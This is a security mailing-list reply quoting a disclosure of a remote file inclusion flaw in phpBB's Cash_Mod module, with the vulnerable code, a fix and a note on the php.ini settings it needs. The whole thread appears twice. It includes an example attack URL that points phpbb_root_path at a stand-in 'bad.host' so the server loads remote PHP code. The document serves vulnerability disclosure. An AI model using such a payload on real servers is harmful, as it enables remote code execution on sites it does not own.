Let me just point out that this vulnerability can only be exploited if
two options in php.ini are enabled:
- allow_url_fopen
- register_globals
The first one allows to access and retrieve http resources from fopen;
the second lets a user specify GET or POST parameters that will be
translated into PHP variables.
For more information about PHP insertion and how it can be recognized
and exploited:
http://www.fistconference.org/data/presentaciones/exploitingwebapplicati
ons.tar
Greetings.
-------------------------------
Rafael San Miguel Carrasco
Security Consultant
Davinci Consulting
-------------------------------
Jerome ATHIAS wrote:
>Hi all
>
>phpBB is a very popular message board using modules extensions.
>
>One of these module ? Cash_Mod is a very popular one and is used by many people. It has critical vulnerabilities, one of them letting anyone inject malicious PHP code that will be executed on the server side.
>
>Let?s start :
>
>In file /admin/admin_cash.php
>
>?..
>if ( !empty($setmodules) )
>{
>include($phpbb_root_path . 'includes/functions_cash.'.$phpEx);
>$menu = array();
>admin_menu($menu);
>?.
>
>First, nothing seems wrong! It?s just a normal piece of code with ?include? functions, but
>$phpbb_root_path & .$phpEx ? are *NOT* define yet!
>
>
>I don?t know why, but someone decided to define these variables later in the code :
>
>??
>//
>// Let's set the root dir for phpBB
>//
>$phpbb_root_path = "./../";
>require($phpbb_root_path . 'extension.inc');
>require('./pagestart.' . $phpEx);
>include($phpbb_root_path . 'includes/functions_selects.'.$phpEx);
>
>?..
>
>Well, any user can rewrite these parameters with GET or POST requests.
>
>Example :
>http://victim.host/phpBB2/admin/admin_cash.php?setmodules=1&phpbb_root_
path=http://bad.host/
>
>
>Fix :
>Set all default parameters after ?if ( !empty($setmodules) )?
>
>Example :
>
>//
>// Let's set the root dir for phpBB
>//
>$phpbb_root_path = "./../";
>require($phpbb_root_path . 'extension.inc');
>require('./pagestart.' . $phpEx);
>include($phpbb_root_path . 'includes/functions_selects.'.$phpEx);
>
>if ( !empty($setmodules) )
>{
>include($phpbb_root_path . 'includes/functions_cash.'.$phpEx);
>$menu = array();
>admin_menu($menu);
>
>
>Thank you rofl!
>
>
>
Let me just point out that this vulnerability can only be exploited if
two options in php.ini are enabled:
- allow_url_fopen
- register_globals
The first one allows to access and retrieve http resources from fopen;
the second lets a user specify GET or POST parameters that will be
translated into PHP variables.
For more information about PHP insertion and how it can be recognized
and exploited:
http://www.fistconference.org/data/presentaciones/exploitingwebapplicati
ons.tar
Greetings.
-------------------------------
Rafael San Miguel Carrasco
Security Consultant
Davinci Consulting
-------------------------------
Jerome ATHIAS wrote:
>Hi all
>
>phpBB is a very popular message board using modules extensions.
>
>One of these module ? Cash_Mod is a very popular one and is used by many people. It has critical vulnerabilities, one of them letting anyone inject malicious PHP code that will be executed on the server side.
>
>Let?s start :
>
>In file /admin/admin_cash.php
>
>?..
>if ( !empty($setmodules) )
>{
>include($phpbb_root_path . 'includes/functions_cash.'.$phpEx);
>$menu = array();
>admin_menu($menu);
>?.
>
>First, nothing seems wrong! It?s just a normal piece of code with ?include? functions, but
>$phpbb_root_path & .$phpEx ? are *NOT* define yet!
>
>
>I don?t know why, but someone decided to define these variables later in the code :
>
>??
>//
>// Let's set the root dir for phpBB
>//
>$phpbb_root_path = "./../";
>require($phpbb_root_path . 'extension.inc');
>require('./pagestart.' . $phpEx);
>include($phpbb_root_path . 'includes/functions_selects.'.$phpEx);
>
>?..
>
>Well, any user can rewrite these parameters with GET or POST requests.
>
>Example :
>http://victim.host/phpBB2/admin/admin_cash.php?setmodules=1&phpbb_root_
path=http://bad.host/
>
>
>Fix :
>Set all default parameters after ?if ( !empty($setmodules) )?
>
>Example :
>
>//
>// Let's set the root dir for phpBB
>//
>$phpbb_root_path = "./../";
>require($phpbb_root_path . 'extension.inc');
>require('./pagestart.' . $phpEx);
>include($phpbb_root_path . 'includes/functions_selects.'.$phpEx);
>
>if ( !empty($setmodules) )
>{
>include($phpbb_root_path . 'includes/functions_cash.'.$phpEx);
>$menu = array();
>admin_menu($menu);
>
>
>Thank you rofl!
>
>
>
[ reply ]